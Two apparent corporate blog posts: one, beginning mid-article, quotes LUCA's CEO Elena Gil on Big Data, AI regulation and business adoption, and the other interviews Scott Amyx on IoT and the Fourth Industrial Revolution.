“They want to present a book that presents Artificial Intelligence in Spain, that contains the legal, social and ethical implications that are believed to be of importance so that the country becomes a benchmark in terms of Artificial Intelligence”, because, as the CEO of LUCA assured, “that will depend on the country’s competitiveness in both the short and mid-terms”.

This regulation has become necessary given the large amount of data that makes up people’s lives. “Big Data and Artificial Intelligence are in our day to day lives without us being aware of them, and we are only starting to see the potential that they represent”, claimed Elena Gil. She put specific emphasis on the importance of proper data management, and on the fact that the positive implications that Big Data brings with it could be seen as risks if they are not treated in the correct way.

Incorporating the world of data into businesses is and will be an important change that “should be made in the proper way and extract all of its potential”. Democratizing access to data is the objective to reach, and therefore the capacity of processing will be essential. “What stands in front of us is so huge that it is very difficult to know when it will reach a maturity”, adds Elena Gil, and “we are not even able to imagine everything that Big Data will offer us in the future”.

Personalized Shopping, the future challenge

Being attended 24 hours a day is a reality to which society is accustomed. Clients are becoming more demanding and they search for greater personalization because “they are no longer satisfied with an average offer”. Better understanding clients is the challenge faced by companies. Therefore, LUCA is using the experience and capabilities of Telefonica in order to help companies, in the best way possible, to be supported by data.
Figure 3 : Elena explains the need for greater personalization as consumers “are no longer satisfied with an average offer”.

These are a series of future challenges for which Elena Gil believes that companies have to adapt their organizations to two types of necessary resources. Firstly, there are the Big Data and Artificial Intelligence specialists, such as the data scientists, data architects or data engineers. These are “rare critical profiles” that are responsible for ensuring that the companies have adequate storage and processing capabilities and for the development of algorithms and models. Additionally, it is necessary to have less technical profiles that work with data in other disciplines, such as marketing specialists or financial areas. The implication and coordination of all of this will be necessary to propel a “cultural change” that allows the “extraction of value that these technologies are bringing”.

Main trends for 2018

Big Data, along with Artificial Intelligence, has defined technological trends in recent years, and in 2018 this will not change. As the CEO of LUCA assures, “this year there will be an advance in the real-time decision-making process”. Other technologies such as the Cloud, Machine Learning or Deep Learning are “opening horizons” for Big Data. There are always more areas for development, for example chatbots, “that are revolutionizing the customer’s commercial attention” and in this way achieving a “greater satisfaction”.

Predictions

But not all data collected is useful. According to a report published by Cisco, the majority of the data that we will work with in 2020 will be short-lived, and only 10% will be useful for businesses. It is a prediction that Elena Gil is cautious about and prefers not to anticipate. “It is certain that the data explosion is huge” and it will amplify further in the future with the development of IoT, but it is also true that “it will become more and more ephemeral”. According to the CEO of LUCA, the existing trend focusses more on the analysis of data at the source. If the data are used then they will be of benefit; if not, they will disappear. This will make information storage a selective process for businesses. However, as the Big Data expert recalls, it is still too early to make predictions.

SMEs and startups are knocking on the door

In the business panorama, in general, the percentage of investment in Big Data is advancing with giant steps, although the proportion remains low. SMEs and startups seem more reluctant to take a chance with it, perhaps due to the financial outlay that is assumed, or out of fear and a lack of knowledge on the topic. Elena Gil encourages businesses to try it, as “it is more and more accessible” and there are “models such as Cloud and “as a service” that allows them to not make investments and only use what they need at any time”, said the director of LUCA, highlighting the scalability of Big Data. “It allows you to start in a small ecosystem, try and demonstrate that it has value without needing to make big decisions before seeing its advantages”.

And on this topic, Elena Gil encourages a “loss of fear” to invest in data as long as you know what you want to use it for. “It is important that Big Data is at the service of the company’s interests”, reminds the director of LUCA, for whom a hopeful future will arrive: a future where ethics and regulation will take a special role to improve and try to strengthen the presence and efficiency of Big Data in society.
Original content in Spanish written by Marta Nieto from Blog Think Big

“Truly the Matrix, minus the human batteries”

Beatriz Sanz Baños    15 February, 2018

The Fourth Industrial Revolution is about much more than just applying today’s technology to industries. It’s about integrating intelligent cyber-physical systems such as AI and machine learning along with cybersecurity, blockchain, the Internet of Things, robotics, quantum computing, advanced materials… and much more. In return, it promises to revolutionize the world as we know it. We asked Scott Amyx, the author of Strive: How Doing the Things Most Uncomfortable Leads to Success and a global thought leader in industry about how this will affect the future of the IoT. This is what we found out from this interesting chat.  

The “subtle” role of the IoT in Industry 4.0

“Perhaps to the surprise of some readers, disruptive technologies rarely work in isolation,” the expert told us, talking about the relationship between the IoT and the new Industrial Revolution. “It’s the convergence of these technologies that drives up the innovation.” And both industry and the IoT are flip sides of the same innovation coin.

The IoT, in particular, plays a critical role in several ways, explained Amyx. “The first is the ability to quantify inanimate and animate objects to build a real-time data matrix of the world. That means that we will generate incredible volume, variety, and velocity of data from the environment, natural resources, buildings, cars, cities, and homes.” The interviewee called them “the 3Vs.” But delving deeper into that theme, we also have to talk about certain applications.

“That data, in turn, feeds neural networks to understand patterns and create probabilistic predictions of possible future scenarios,” explained Amyx. “This informs businesses, governments, NGO’s, and people so they can make real-time, fact-based decisions that drive up optimization, productivity, and efficiency while lowering costs and mitigating potential risks and issues.”

“We’ve moved beyond networks and cables to real time”

In addition to the symbiotic relationship between the IoT, AI, and data science is the shift to distributed and decentralized computing networks. “Let me give two examples,” Amyx continued. “Network TV stations such as NBC, ABC, and CBS represented the one-to-many paradigm that provided a centralized means of distributing content to the masses. Today, we’ve moved beyond networks and cables to real-time streaming and user-generated content in a many-to-many content creation and distribution model.”

Similarly, in the world of computing and data, we are seeing a shift from centralized to decentralized. Not only are data being generated on decentralized IoT devices, but they are also being stored and processed locally (known as “wild fog”). Specialized AI chips are enabling decentralized machines and gadgets to run AI algorithms locally without ever needing to make API calls, as well as Lambda functions in Amazon Web Services, which allow for computing without servers and without back-and-forth traffic to process, store, or disseminate.

“We are beginning to access distributed computational power, memory, storage, bandwidth, and features of edge devices to perform jobs. This has huge implications for telecom business models, cloud computing giants, privacy, data ownership, and security, with rippling effects even to how we govern our society or aggregate citizen preferences to cryptocurrency,” he continued. “IoT, AI, and blockchain all work in unison to create a world that will become hyper-connected, where every action and inaction will be quantified down to the iota. Truly the Matrix, minus the human batteries.”

An age of revolution

In terms of economic and social impact, the Fourth Industrial Revolution may be bigger and more disruptive than the first three combined. But this is about much more than just applying today’s technology to industries. It’s about integrating intelligent cyber-physical systems such as AI and machine learning to neural networks and deep learning, IoT, or even advanced materials such as graphene and new forms of energy and battery storage to leapfrog competitors and create business models and processes that were not possible before.

“Taking the example of renewable energy,” Amyx explains, “it is using exponential technologies to lower the CapEx and OpEx, quantify every facet of the value chain, automate processes, and substantially increase the output of renewable energy to usable electricity on a massive scale. In the process of fundamentally creating an entirely new ecosystem, there will be multi-billion-dollar startup opportunities, from next-gen CSP companies to new forms of liquified energy.”

Amyx refers to liquid hydrogen and ammonia as fuels that store renewable energy and make it easier to export it around the globe. “We are talking about advanced commercial fuel cells and industry batteries with a larger capacity than Tesla’s Powerpacks (greater than 100 to 200 kWh while costing $2.13 to $2.51 per Wh). We’re also talking about energy harvesting and wireless power transfer technologies to help our cities and homes be completely cord-free and the aboveground space infrastructure-free.”

In Amyx’s words, when you apply this type of transformation to each sector or industry, what you get is nothing short of multi-billion to multi-trillion-dollar opportunities. “Many of today’s Fortune 500 companies (and midcaps and SMB’s) are resistant to change and will become obsolete, or be acquired, or go private just to go bankrupt and be sold in pieces or die a slow death because their management and employees can’t imagine a world that’s different from the framework that they operate in today. Replacing them will be the startups of the future that will harness the power of AI, robotics, and other exponential technologies to fundamentally change both the game and the way the game is played.”

Our place in the future

Amyx thinks it’s important to understand that the fourth and subsequent Industrial Revolutions will be both good and bad. And, in his words, it mostly depends on which segments of the population that we focus on. “As we have seen across industries, technology is about driving down costs. Over time, in everything from genome sequencing to hard drives, the marginal cost drops down to a tiny fraction of what it used to be. This is a major benefit to society,” he clarifies.

“Moreover, these disruptions will also create unimaginable new industries and jobs that we can’t begin to fathom today. Who would have thought a decade ago that Snapchat, an AR photo filter, or chat app would be worth billions of dollars and employ engineers to create AR filters for selfies? But there are downsides.”

Amyx discussed this in The Human Race: How Humans Can Survive in the Robotic Age, his second book, in which he explores the imminent net job loss from artificial intelligence, robotics, and the Fourth Industrial Revolution and its impact on income inequality across the globe. “AI-driven cyber-physical automation is expected to displace 50% to 80% of the human workforce by 2030. As the pace of convergence of exponential technologies reaches a near vertical slope, the trend of human displacement is unstoppable,” he stated in his book.

But with the revolution come opportunities, too. We are facing a new era of advancement where connectivity is within the sight of development. As we move towards automation, we must be prepared to adapt to innovation. This, Amyx thinks, entails pursuing job training and labor force development in human-to-human services that leverage our ability to empathize with the human condition. After all, even in the age of technology, when we are the witnesses of change, empathy business models and services will become the bedrock of post-Fourth Industrial Revolution.